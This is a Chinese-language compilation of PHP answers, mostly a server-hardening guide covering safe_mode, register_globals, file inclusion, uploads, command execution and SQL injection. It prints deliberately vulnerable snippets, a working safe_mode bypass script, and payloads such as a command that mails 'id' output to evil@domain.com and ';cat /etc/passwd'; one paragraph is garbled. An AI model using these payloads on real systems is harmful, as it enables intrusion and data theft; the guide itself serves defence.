本文目錄一覽:
PHP配置。
不知道你這段代碼從何而來, 只能從字面上理解大概:
?php
return array(
‘default’ = array (
‘hostname’ = ‘localhost’, //mysql數據庫服務器地址, 本地為localhost或者127.0.0.1, 遠程就是msyql數據庫所在服務器的ip地址(這裡所謂的本地, 是指php網站與mysql數據庫在同一台服務器, 並不是絕對的指你的電腦)
‘database’ = ‘ps_za’,數據庫? //這個是數據庫名稱, mysql確切的說是數據庫平台, 可以擁有多個數據庫, 所有得指明具體是哪個數據庫
‘username’ = ‘root’,用戶名?//這個是登錄mysql數據庫的用戶名
‘password’ = ‘123456’,密碼?//這個是密碼, 與上面同理
‘tablepre’ = ‘go_’, 這個? //這個是數據表的前綴, 一般的開源CMS都會在數據表的命名上加一個統一的前綴,用於區分同一個數據庫中存在多個網站的數據表
‘charset’ = ‘utf8’, UTF8字符? //這個是數據庫使用的編碼,
‘type’ = ‘mysql’, 這個應該就是MYSQL //數據庫類型
‘debug’ = true, 這個? //這個應該是設置是否顯示錯誤
‘pconnect’ = 0, 這個? //這個應該用於設置是否使用msyql永久連接
‘autoconnect’ = 0 這個? //這個應該是設置是否自動連接數據庫
),
);
?
閣下應該不懂php編程的吧?
PHP服務器配置問題
3. 在c:\php5文件夾中,用記事本打開文件php.ini-dist,修改如下內容後“另存為…”php.ini文件
(1)查找到safe_mode = 段落,將safe_mode = Off修改為safe_mode = On
(2)查找到expose_php = On段落,將expose_php = On修改為expose_php = Off
(3)查找到display_errors = On段落,將display_errors = On修改為display_errors = Off
(4)查找到extension_dir = 段落,設置動態庫擴展的路徑,如extension_dir = c:\php5\ext
(5)查找到 ; cgi.force_redirect = 1段落,修改為 cgi.force_redirect = 0
提示:(4)和(5)是必須做的。記着要另存為php.ini
4. 將編輯好的php.ini文件剪切到Windows安裝文件夾下(如:C:\Winnt 或 C:\Windows)
5. 在IIS中,選擇要使用PHP的站點,右鍵菜單中選擇“屬性”,選擇“主目錄”標籤,在該界面中點“配置”,添加或重新編輯php擴展的“應用程序擴展名映射”,可執行文件選擇為C:\php5\php5isapi.dll,擴展名為php,確定應用後退出IIS配置
6. 停止IIS的WEB站點,並重新啟動該站點。
PHP學習系列問題之一:怎樣配置PHP環境?
首先說一下我用的軟件版本。PHP 5.1.6APACHE 2.0.59(注意:APACHE 2.2.X版本以上要增加插件才支持PHP 5的)MYSQL 5.0.24a 好了,現在開始安裝,我先裝的php5,直接解壓文件到C:\php(安裝到哪裡並不會有影響,憑個人喜號,本文中的所有路徑都以我的安裝路徑,請大家在自己的機器上安裝的時候注意修改為自己的路徑),接着安裝APACHE,我直接把它裝到C盤根目錄下,在安裝過程中,會出現3個文本框,上面兩個輸入你的本機IP,最下面的輸入你的EMAIL,好的。安裝完畢。現在編輯..\Apache Group\Apache2\conf\下的httpd.conf文件。用記事本打開該文件,在最後添上這兩行代碼:LoadModule php5_module “C:/php/php5apache2.dll” AddType application/x-httpd-php .php 我在C:\目錄下建立了一個www的目錄用於存放我的站點文件,在httpd.conf里找到這樣一句話:DocumentRoot “C:/Apache2/htdocs”改成了DocumentRoot “C:/www”。這樣,就將主目錄設置成了C:\www。如果你不想更改主目錄位置,可以不更改此項。 修改目錄的默認首頁: 找到DirectoryIndex 後面寫上你想設置為首頁的文件名,如:index.html index.php等。 語言優先級,找到下列語句LanguagePriority zh-CN zh-TW en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv 把中文(zh-CN zh-TW)的部分剪切放到前面(也就是將原來文件中的相應部分改成如上的。其他也沒什麼好改動的。APACH的配置就到這裡。接着講PHP的配置。把php.ini-dist複製到C:\windows 下改名為 php.ini(裝過php的都做過吧)然後修改了幾個地方:在Data Handling下找到post_max_size = 8M這是PHP將接受的POST數據最大大小,可更改為20M。在Paths and Directories下找到extension_dir=這裡設置的是PHP搜索擴展庫的位置,將其路徑設為extensions文件夾的位置,即改成:extension_dir= “C:\php\ext”在File Uploads下找到upload_max_filesize = 2M,允許上傳的的最大文件大小可更改為20M。Dynamic Extensions這裡是PHP擴展設置部分,列出了PHP所有的可支持擴展,前面都加了分號注釋,表示目前PHP配置不支持擴展,我們可以將分號去掉讓PHP支持該擴展下面列出的是幾個常用且較實用的PHP擴展把下面幾句前面的分號去掉 ;extension=php_mbstring.dll;extension=php_dba.dll ;extension=php_dbase.dll ;extension=php_filepro.dll ;extension=php_gd2.dll ;extension=php_imap.dll ;extension=php_mysql.dll 到這裡php.ini就配置結束。接着很重要的一點將C:\PHP\libmysql.dll,C:\PHP\ext\php_mysql.dll,C:\PHP\ext\php_mysqli.dll拷貝到C:\Windows\system32下,這樣PHP5才能支持MYSQL。哇靠,,居然不夠寫,繼續重起APACHE,在主目錄下新建一個記事本文件test在裡面輸入?phpphpinfo();?保存後修改後綴名為PHP。在瀏覽器輸入 是不是看到PHP版本信息,沒錯,這樣PHP的配置就完成了。接下來安裝MYSQL。第一步:雙擊.exe文件出現的第一個需要選擇的對話框是Setup Type 也就是安裝種類,這裡我們可以選擇Custom,根據自己的需要來安裝組件和配置安裝路徑點擊Next,右鍵點擊對話框出現幾個硬盤形狀的圖標,根據自己的需要選擇安裝組件,點擊窗口右下的Change按鈕更改安裝路徑的,設置好後,點擊Next開始安裝安裝到最後會有如下一個對話框在這裡的三個選項分別是:1:如果你沒有MYSQL.com帳戶,選第一個,創造一個新的免費的MYSQL.com帳戶2:如果你有MYSQL.com帳戶,選第二個,填入已經註冊好的郵箱名和密碼3:跳過此步驟我們選第一個接下來會一次出現三個對話框,在三個對話框中有* 號的部分是必須要填的,按順序分別是郵箱名,密碼,確認密碼;first name ,last name;郵政編碼,國家,省名。國家名選china,省名選other or N/A即可4.1.x和4.0.x系列版本很大一個區別就是在安裝完畢後不是運行 mysql文件夾下面的winmysqladmin.exe來啟動服務器後設置選項,而是有一個設置的過程。第二步:設置MYSQL首先你會看到這樣的一個窗口,這裡有兩個選項,分別是詳細配置和標準配置,小型應用選第二項就可以了點擊Next後出現下面的對話框,這裡是重要的,一定要在下拉菜單里選擇MySQL41,否則不能正常啟動,下面的選項是是否應用命令行,最好選上點擊Next後設置數據庫密碼的對話框,中間偏右和下面的選項分別是是否允許遠程控制和是否允許匿名帳號登入,為了安全,不要選擇好了,點擊Next後出現最後的對話框,點擊Execute按鈕數據庫服務器便啟動了,依次出現四個對號後點擊Finish結束安裝 裝上PHPMYADMIN後測試連接,若出現#1251 – Client does not support authentication protocol requested by server; consider upgrading MySQL client 在開始菜單找到剛剛安裝的MYSQL命令行工具,輸入root的密碼後鍵入如下的字樣:mysql UPDATE mysql.user SET Password = OLD_PASSWORD(‘剛才設置的ROOT密碼’) – WHERE Host = ‘localhost’ AND User = ‘root’; mysql FLUSH PRIVILEGES;(注意FLUSH後有空格)然後瀏覽“ ”,OH YEAH! 測試成功! 在談一下關於MYSQL 4.1以後由於採用UTF8導致的亂碼問題解決辦法。首先注意一點,在新建數據庫的時候字符集一定要選擇UTF8,在PHPMYADMIN中新建數據庫下,創建按鈕的左邊,有個下拉列表,默認是“整理”,選擇UTF8。你會發現表裡數據不在是問號了。但是網頁的輸出還是問號,不要急接着在PHP語句中要有所改動:在mysql_connect(…連接參數);後加上mysql_query(“SET NAMES ‘GBK'”);但是如果網頁很多,這樣不是很麻煩,所以我在編寫PHP時將所有數據庫的操作寫成一個類如:class db{….包含一些數據庫調用方法…. //創建數據庫連接並選擇相應數據庫 function createcon(){ mysql_connect(…);mysql_query(“SET NAMES ‘GBK'”);}}這樣,改動一處就可以了,是不是很方便
php安全配置 如何配置使其更安全
一、Web服務器安全
PHP其實不過是Web服務器的一個模塊功能,所以首先要保證Web服務器的安全。當然Web服務器要安全又必須是先保證系統安全,這樣就扯遠了,無窮無盡。PHP可以和各種Web服務器結合,這裡也只討論Apache。非常建議以chroot方式安裝啟動Apache,這樣即使Apache和PHP及其腳本出現漏洞,受影響的也只有這個禁錮的系統,不會危害實際系統。但是使用chroot的Apache後,給應用也會帶來一定的麻煩,比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接,這在效率上會稍微差一點。還有mail函數發送郵件也是個問題,因為php.ini里的:
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
都是針對Win32平台,所以需要在chroot環境下調整好sendmail。
二、PHP本身問題
1、遠程溢出
PHP-4.1.2以下的所有版本都存在文件上傳遠程緩衝區溢出漏洞,而且攻擊程序已經廣泛流傳,成功率非常高:
2、遠程拒絕服務
PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞,雖然不能獲得本地用戶權限,但是也能造成拒絕服務。
3、safe_mode繞過漏洞
還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數繞過safe_mode限制執行命令漏洞,4.0.5版本開始mail函數增加了第五個參數,由於設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單,只需用分號隔開後面加shell命令就可以了,比如存在PHP腳本evil.php:
? mail(“foo@bar,”foo”,”bar”,””,$bar); ?
執行如下的URL:
;/usr/bin/id|mail evil@domain.com
這將id執行的結果發送給evil@domain.com。
對於4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數,所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令:
?
# 注意,下面這兩個必須是不存在的,或者它們的屬主和本腳本的屬主是一樣
$script=”/tmp/script123″;
$cf=”/tmp/cf123″;
$fd = fopen($cf, “w”);
fwrite($fd, “OQ/tmp
Sparse=0
R$*” . chr(9) . “$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script”);
fclose($fd);
$fd = fopen($script, “w”);
fwrite($fd, “rm -f $script $cf; “);
fwrite($fd, $cmd);
fclose($fd);
mail(“nobody”, “”, “”, “”, “-C$cf”);
?
還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本,這樣才能消除基本的安全問題。
三、PHP本身的安全配置
PHP的配置非常靈活,可以通過php.ini, httpd.conf, .htaccess文件(該目錄必須設置了AllowOverride All或Options)進行設置,還可以在腳本程序里使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。
如果配置選項是唯一PHP_INI_SYSTEM屬性的,必須通過php.ini和httpd.conf來修改,它們修改的是PHP的Master值,但修改之後必須重啟apache才能生效。其中php.ini設置的選項是對Web服務器所有腳本生效,httpd.conf里設置的選項是對該定義的目錄下所有腳本生效。
如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置,也可以通過在腳本程序自身用ini_set()函數設定,它們修改的是Local值,改了以後馬上生效。但是.htaccess只對當前目錄的腳本程序生效,ini_set()函數只對該腳本程序設置ini_set()函數以後的代碼生效。各個版本的選項屬性可能不盡相同,可以用如下命令查找當前源代碼的main.c文件得到所有的選項,以及它的屬性:
# grep PHP_INI_ /PHP_SRC/main/main.c
在討論PHP安全配置之前,應該好好了解PHP的safe_mode模式。
1、safe_mode
safe_mode是唯一PHP_INI_SYSTEM屬性,必須通過php.ini或httpd.conf來設置。要啟用safe_mode,只需修改php.ini:
safe_mode = On
或者修改httpd.conf,定義目錄:
Directory /var/www
Options FollowSymLinks
php_admin_value safe_mode 1
/Directory
重啟apache後safe_mode就生效了。啟動safe_mode,會對許多PHP函數進行限制,特別是和系統相關的文件打開、命令執行等函數。
所有操作文件的函數將只能操作與腳本UID相同的文件,比如test.php腳本的內容為:
?include(“index.html”)?
幾個文件的屬性如下:
# ls -la
total 13
drwxr-xr-x 2 root root 104 Jul 20 01:25 .
drwxr-xr-x 16 root root 384 Jul 18 12:02 ..
-rw-r–r– 1 root root 4110 Oct 26 2002 index.html
-rw-r–r– 1 www-data www-data 41 Jul 19 19:14 test.php
在瀏覽器請求test.php會提示如下的錯誤信息:
Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1
如果被操作文件所在目錄的UID和腳本UID一致,那麼該文件的UID即使和腳本不同也可以訪問的,不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途,絕對禁止使用root做為php腳本的屬主,這樣就達不到safe_mode的效果了。
如果想將其放寬到GID比較,則打開 safe_mode_gid可以考慮只比較文件的GID,可以設置如下選項:
safe_mode_gid = On
設置了safe_mode以後,所有命令執行的函數將被限制只能執行php.ini里safe_mode_exec_dir指定目錄里的程序,而且shell_exec、`ls -l`這種執行命令的方式會被禁止。如果確實需要調用其它程序,可以在php.ini做如下設置:
safe_mode_exec_dir = /usr/local/php/exec
然後拷貝程序到該目錄,那麼php腳本就可以用system等函數來執行該程序。而且該目錄里的shell腳本還是可以調用其它目錄里的系統命令。
safe_mode_include_dir string
當從此目錄及其子目錄(目錄必須在 include_path 中或者用完整路徑來包含)包含文件時越過 UID/GID 檢查。
從 PHP 4.2.0 開始,本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑,而不只是一個目錄。
指定的限制實際上是一個前綴,而非一個目錄名。這也就是說“safe_mode_include_dir = /dir/incl”將允許訪問“/dir/include”和“/dir/incls”,如果它們存在。如果您希望將訪問控制在一個指定的目錄,那麼請在結尾加上一個斜線,例如:“safe_mode_include_dir = /dir/incl/”。
safe_mode_allowed_env_vars string
設置某些環境變罧贍蓯喬痹詰陌踩?笨凇1局噶畎??幸桓齠漢歐指艫那白毫斜懟T詘踩?J較攏?沒е荒芨謀淠切┟?志哂性謖飫鍰峁┑那白旱幕肪潮淞俊D?杴榭魷攏?沒е荒萇柚靡?PHP_ 開頭的環境變量(例如 PHP_FOO = BAR)。
注: 如果本指令為空,PHP 將使用戶可以修改任何環境變量!
safe_mode_protected_env_vars string
本指令包含有一個逗號分隔的環境變量的列表,最終用戶不能用 putenv() 來改變這些環境變量。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變量。
雖然safe_mode不是萬能的(低版本的PHP可以繞過),但還是強烈建議打開安全模式,在一定程度上能夠避免一些未知的攻擊。不過啟用safe_mode會有很多限制,可能對應用帶來影響,所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。
討論完safe_mode後,下面結合程序代碼實際可能出現的問題討論如何通過對PHP服務器端的配置來避免出現的漏洞。
2、變量濫用
PHP默認register_globals = On,對於GET, POST, Cookie, Environment, Session的變罧梢災苯幼⒉岢扇?直淞俊K?塹淖⒉崴承蚴莢ariables_order = “EGPCS”(可以通過php.ini修改),同名變量variables_order右邊的覆蓋左邊,所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變量初始化的習慣,像如下的程序片斷就極易受到攻擊:
?
//test_1.php
if ($pass == “hello”)
$auth = 1;
if ($auth == 1)
echo “some important information”;
else
echo “nothing”;
?
攻擊者只需用如下的請求就能繞過檢查:
這雖然是一個很弱智的錯誤,但一些著名的程序也有犯過這種錯誤,比如phpnuke的遠程文件拷貝漏洞
PHP-4.1.0發布的時候建議關閉register_globals,並提供了7個特殊的數組變量來使用各種變量。對於從GET、POST、COOKIE等來的變量並不會直接註冊成變量,必需通過數組變量來存取。PHP-4.2.0發布的時候,php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值,一般為0,避免了攻擊者控制判斷變量。
解決方法:
配置文件php.ini設置register_globals = Off。
要求程序員對作為判斷的變量在程序最開始初始化一個值。
3、文件打開
極易受攻擊的代碼片斷:
?
//test_2.php
if (!($str = readfile(“$filename”))) {
echo(“Could not open file: $filenameBR\n”);
exit;
}
else {
echo $str;
}
?
由於攻擊者可以指定任意的$filename,攻擊者用如下的請求就可以看到/etc/passwd:
如下請求可以讀php文件本身:
PHP中文件打開函數還有fopen(), file()等,如果對文件名變量檢查不嚴就會造成服務器重要文件被訪問讀取。
解決方法:
如非特殊需要,把php的文件操作限制在web目錄裡面。以下是修改apache配置文件httpd.conf的一個例子:
Directory /usr/local/apache/htdocs
php_admin_value open_basedir /usr/local/apache/htdocs
/Directory
重啟apache後,/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了,否則PHP就會報錯:
Warning: open_basedir restriction in effect. File is in wrong directory in xxx on line xx.
使用safe_mode模式也能避免這種問題,前面已經討論過了。
4、包含文件
極易受攻擊的代碼片斷:
?
//test_3.php
if(file_exists($filename))
include(“$filename”);
?
這種不負責任的代碼會造成相當大的危害,攻擊者用如下請求可以得到/etc/passwd文件:
如果對於Unix版的PHP(Win版的PHP不支持遠程打開文件)攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件,的內容是?passthru(“ls /etc”)?,那麼如下的請求就可以在目標主機執行命令ls /etc:
攻擊者甚至可以通過包含apache的日誌文件access.log和error.log來得到執行命令的代碼,不過由於干擾信息太多,有時不易成功。
對於另外一種形式,如下代碼片斷:
?
//test_4.php
include(“$lib/config.php”);
?
攻擊者可以在自己的主機建立一個包含執行命令代碼的config.php文件,然後用如下請求也可以在目標主機執行命令:
PHP的包含函數有include(), include_once(), require(), require_once。如果對包含文件名變量檢查不嚴就會對系統造成嚴重危險,可以遠程執行命令。
解決方法:
要求程序員包含文件里的參數盡量不要使用變量,如果使用變量,就一定要嚴格檢查要包含的文件名,絕對不能由用戶任意指定。
如前面文件打開中限制PHP操作路徑是一個必要的選項。另外,如非特殊需要,一定要關閉PHP的遠程文件打開功能。修改php.ini文件:
allow_url_fopen = Off
重啟apache。
5、文件上傳
php的文件上傳機制是把用戶上傳的文件保存在php.ini的upload_tmp_dir定義的臨時目錄(默認是系統的臨時目錄,如:/tmp)里的一個類似phpxXuoXG的隨機臨時文件,程序執行結束,該臨時文件也被刪除。PHP給上傳的文件定義了四個變量:(如form變量名是file,而且register_globals打開)
$file #就是保存到服務器端的臨時文件(如/tmp/phpxXuoXG )
$file_size #上傳文件的大小
$file_name #上傳文件的原始名稱
$file_type #上傳文件的類型
推薦使用:
$HTTP_POST_FILES[file][tmp_name]
$HTTP_POST_FILES[file][size]
$HTTP_POST_FILES[file][name]
$HTTP_POST_FILES[file][type]
這是一個最簡單的文件上傳代碼:
?
//test_5.php
if(isset($upload) $file != “none”) {
copy($file, “/usr/local/apache/htdocs/upload/”.$file_name);
echo “文件”.$file_name.”上傳成功!點擊a href=\”$PHP_SELF\”繼續上傳/a”;
exit;
}
?
html
head
title文件上傳/title
meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″
/head
body bgcolor=”#FFFFFF”
form enctype=”multipart/form-data” method=”post”
上傳文件:
input type=”file” name=”file” size=”30″
input type=”submit” name=”upload” value=”上傳”
/form
/body
/html
這樣的上傳代碼存在讀取任意文件和執行命令的重大問題。
下面的請求可以把/etc/passwd文檔拷貝到web目錄/usr/local/apache/htdocs/test(注意:這個目錄必須nobody可寫)下的attack.txt文件里:
… ile_name=attack.txt
然後可以用如下請求讀取口令文件:
攻擊者可以把php文件拷貝成其它擴展名,泄漏腳本源代碼。
攻擊者可以自定義form里file_name變量的值,上傳覆蓋任意有寫權限的文件。
攻擊者還可以上傳PHP腳本執行主機的命令。
解決方法:
PHP-4.0.3以後提供了is_uploaded_file和move_uploaded_file函數,可以檢查操作的文件是否是用戶上傳的文件,從而避免把系統文件拷貝到web目錄。
使用$HTTP_POST_FILES數組來讀取用戶上傳的文件變量。
嚴格檢查上傳變量。比如不允許是php腳本文件。
把PHP腳本操作限制在web目錄可以避免程序員使用copy函數把系統文件拷貝到web目錄。move_uploaded_file不受open_basedir的限制,所以不必修改php.ini里upload_tmp_dir的值。
把PHP腳本用phpencode進行加密,避免由於copy操作泄漏源碼。
嚴格配置文件和目錄的權限,只允許上傳的目錄能夠讓nobody用戶可寫。
對於上傳目錄去掉PHP解釋功能,可以通過修改httpd.conf實現:
Directory /usr/local/apache/htdocs/upload
php_flag engine off
#如果是php3換成php3_engine off
/Directory
重啟apache,upload目錄的php文件就不能被apache解釋了,即使上傳了php文件也沒有問題,只能直接顯示源碼。
6、命令執行
下面的代碼片斷是從PHPNetToolpack摘出,詳細的描述見:
?
//test_6.php
system(“traceroute $a_query”,$ret_strs);
?
由於程序沒有過濾$a_query變量,所以攻擊者可以用分號來追加執行命令。
攻擊者輸入如下請求可以執行cat /etc/passwd命令:
;cat /etc/passwd
PHP的命令執行函數還有system(), passthru(), popen()和“等。命令執行函數非常危險,慎用。如果要使用一定要嚴格檢查用戶輸入。
解決方法:
要求程序員使用escapeshellcmd()函數過濾用戶輸入的shell命令。
啟用safe_mode可以杜絕很多執行命令的問題,不過要注意PHP的版本一定要是最新的,小於PHP-4.2.2的都可能繞過safe_mode的限制去執行命令。
7、sql_inject
如下的SQL語句如果未對變量進行處理就會存在問題:
select * from login where user=$user and pass=$pass
攻擊者可以用戶名和口令都輸入1 or 1=1繞過驗證。
不過幸虧PHP有一個默認的選項magic_quotes_gpc = On,該選項使得從GET, POST, COOKIE來的變量自動加了addslashes()操作。上面SQL語句變成了:
select * from login where user=1\ or 1=\1 and pass=1\ or 1=\1
從而避免了此類sql_inject攻擊。
對於數字類型的字段,很多程序員會這樣寫:
select * from test where id=$id
由於變量沒有用單引號擴起來,就會造成sql_inject攻擊。幸虧MySQL功能簡單,沒有sqlserver等數據庫有執行命令的SQL語句,而且PHP的mysql_query()函數也只允許執行一條SQL語句,所以用分號隔開多條SQL語句的攻擊也不能奏效。但是攻擊者起碼還可以讓查詢語句出錯,泄漏系統的一些信息,或者一些意想不到的情況。
解決方法:
要求程序員對所有用戶提交的要放到SQL語句的變量進行過濾。
即使是數字類型的字段,變量也要用單引號擴起來,MySQL自己會把字串處理成數字。
在MySQL里不要給PHP程序高級別權限的用戶,只允許對自己的庫進行操作,這也避免了程序出現問題被 SELECT INTO OUTFILE … 這種攻擊。
8、警告及錯誤信息
PHP默認顯示所有的警告及錯誤信息:
error_reporting = E_ALL ~E_NOTICE
display_errors = On
在平時開發調試時這非常有用,可以根據警告信息馬上找到程序錯誤所在。
正式應用時,警告及錯誤信息讓用戶不知所措,而且給攻擊者泄漏了腳本所在的物理路徑,為攻擊者的進一步攻擊提供了有利的信息。而且由於自己沒有訪問到錯誤的地方,反而不能及時修改程序的錯誤。所以把PHP的所有警告及錯誤信息記錄到一個日誌文件是非常明智的,即不給攻擊者泄漏物理路徑,又能讓自己知道程序錯誤所在。
修改php.ini中關於Error handling and logging部分內容:
error_reporting = E_ALL
display_errors = Off
log_errors = On
error_log = /usr/local/apache/logs/php_error.log
然後重啟apache,注意文件/usr/local/apache/logs/php_error.log必需可以讓nobody用戶可寫。
9、disable_functions
如果覺得有些函數還有威脅,可以設置php.ini里的disable_functions(這個選項不能在httpd.conf里設置),比如:
disable_functions = phpinfo, get_cfg_var
可以指定多個函數,用逗號分開。重啟apache後,phpinfo, get_cfg_var函數都被禁止了。建議關閉函數phpinfo, get_cfg_var,這兩個函數容易泄漏服務器信息,而且沒有實際用處。
10、disable_classes
這個選項是從PHP-4.3.2開始才有的,它可以禁用某些類,如果有多個用逗號分隔類名。disable_classes也不能在httpd.conf里設置,只能在php.ini配置文件里修改。
11、open_basedir
前面分析例程的時候也多次提到用open_basedir對腳本操作路徑進行限制,這裡再介紹一下它的特性。用open_basedir指定的限制實際上是前綴,不是目錄名。也就是說 “open_basedir = /dir/incl” 也會允許訪問 “/dir/include” 和 “/dir/incls”,如果它們存在的話。如果要將訪問限制在僅為指定的目錄,用斜線結束路徑名。例如:”open_basedir = /dir/incl/”。
可以設置多個目錄,在Windows中,用分號分隔目錄。在任何其它系統中用冒號分隔目錄。作為Apache模塊時,父目錄中的open_basedir路徑自動被繼承。
四、其它安全配置
1、取消其它用戶對常用、重要系統命令的讀寫執行權限
一般管理員維護只需一個普通用戶和管理用戶,除了這兩個用戶,給其它用戶能夠執行和訪問的東西應該越少越好,所以取消其它用戶對常用、重要系統命令的讀寫執行權限能在程序或者服務出現漏洞的時候給攻擊者帶來很大的迷惑。記住一定要連讀的權限也去掉,否則在linux下可以用/lib/ld-linux.so.2 /bin/ls這種方式來執行。
如果要取消某程如果是在chroot環境里,這個工作比較容易實現,否則,這項工作還是有些挑戰的。因為取消一些程序的執行權限會導致一些服務運行不正常。PHP的mail函數需要/bin/sh去調用sendmail發信,所以/bin/bash的執行權限不能去掉。這是一項比較累人的工作,
2、去掉apache日誌其它用戶的讀權限
apache的access-log給一些出現本地包含漏洞的程序提供了方便之門。通過提交包含PHP代碼的URL,可以使access-log包含PHP代碼,那麼把包含文件指向access-log就可以執行那些PHP代碼,從而獲得本地訪問權限。
如果有其它虛擬主機,也應該相應去掉該日誌文件其它用戶的讀權限。
當然,如果你按照前面介紹的配置PHP那麼一般已經是無法讀取日誌文件了。
能介紹幾個好的php技術blog嗎?
以下內容轉自百度:個人推薦exBlog、O-Blog和Drupal 其它PHPBLOG介紹和下載地址如下: Okphp BLOG: 基於PHP+MYSQL開發的多用戶BLOG系統,部分代碼ZEND,主要特點能夠很好地和許多論壇程序無縫兼容。 BlogHoster: 國外的一個多用戶商業BLOG系統,基於PHP+MYSQL,簡潔明快的風格。 exBlog: 基於PHP/MySQL平台開發,注重穩定效率和兼容性,使用了 PHPLIB 的模板系統,提供WAP接口。 Pixelpost PhotoBlog: 國外的由圖片系統和博客系統融合來的新型博客,已經由落伍的 星 完成漢化。 bMachine: 國外老牌BLOG系統,同時支持文本數據庫和MySQL數據庫,支持中文搜索。 7log: 比較早的能夠生成靜態頁面的BLOG系統,目前開發進度停滯。 O-blog: 需在PHP+MYSQL環境下運行,主要特色對靜態生成有很大的靈活度,作者風色默默無聞地開發也讓人欽佩。 pigface blog: 一個簡單的BLOG,具備所有BLOG必須的功能,基於PHP+MYSQL。 bo-blog: 文本數據庫,現在發展似乎遇到了瓶頸,發展不如年初那麼火熱,但是一樣有很多追隨者。 C-Blog: 由Coolsky 自主開發的基於 PHP+Smarty模版引擎+ADODB組件 的小型單用戶BLOG,目前提供2個版本:php+mysql版本 和php+access版本,能夠生成靜態頁面。 SaBlog: 安全天使小組開發的一套BLOG系統,功能不斷在完善,優點在於安全性很高。 Simple PHP Blog: 國外一個輕便的blog系統,包含中文語言文件。 yo2blog: 一個簡單小巧快捷的 blog 程序,使用假性目錄結構生成類靜態 HTML 頁面鏈接。 sBLOG: 國外一款基於PHP+MySQL的BLOG系統,模板遵循W3C規範,並提供mod_rewrite功能支持。 b2: php blog的老祖宗,操作簡單,容易上手,現在好像停止了開發。 b2evolution: B2多用戶版,有很多風格和插件。 wordpress: 架站比MT簡單一點,功能也很全面,應該是支持blog的首選。它有最強的模版功能,已經開始有限範圍內測試多用戶的新版。 pivot: PHP+XML,沒有使用數據庫,有中文語言包, nucleus: 這個也是比較老牌的程序了,有中文語言包! M-logger: 文本儲存數據。 drupal: 功能強大,在多用戶支持上尤為突出。它看起來更像一個內容發布系統(CMS)而不是一個純blog軟件,所以僅僅只想使用blog功能的朋友就用不着扛着這門炮了。 Pmschine: 這個估計是blog的元老了,不過現在已經商業化了,新版本名叫Expression Engine,在國內可以免費下載! bBlog: 一個非常簡潔好用的blog,漢化版: serendipity: 功能很多,每個功能以模塊方式安裝,界面也很容易修改。 Plog: blog里的最好作品了,真正的多用戶,不過目前官方網站打不開,不知道是不是偶的網絡問題,呵呵! Plainslash: 文本blog程序,作者很久沒更新了,但現在blog的基本功能都有了。
記得採納啊
原創文章,作者:小藍,如若轉載,請註明出處:https://www.506064.com/zh-hant/n/246097.html